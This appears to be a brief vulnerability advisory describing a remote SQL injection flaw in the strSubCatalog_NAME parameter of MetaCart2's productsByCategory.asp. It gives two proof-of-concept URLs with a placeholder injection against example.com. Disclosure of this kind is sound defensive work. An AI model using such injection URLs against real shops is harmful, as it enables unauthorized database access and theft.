MetaCart2 strSubCatalog_NAME Parameter Remote SQL Injection Vulnerability

MetaCart2 strSubCatalog_NAME Parameter Remote SQL Injection Vulnerability

No exploit is required to leverage this issue.

The following proof of concepts are available:

http://www.example.com/mcart2pfp/productsByCategory.asp?strSubCatalogID=1&amp%3bcurCatalogID=10001&amp%3bstrSubCatalog_NAME='SQL_INJECTION
http://www.example.com/mcart2pal/productsByCategory.asp?strSubCatalogID=1&amp%3bcurCatalogID=10001&amp%3bstrSubCatalog_NAME='SQL_INJECTION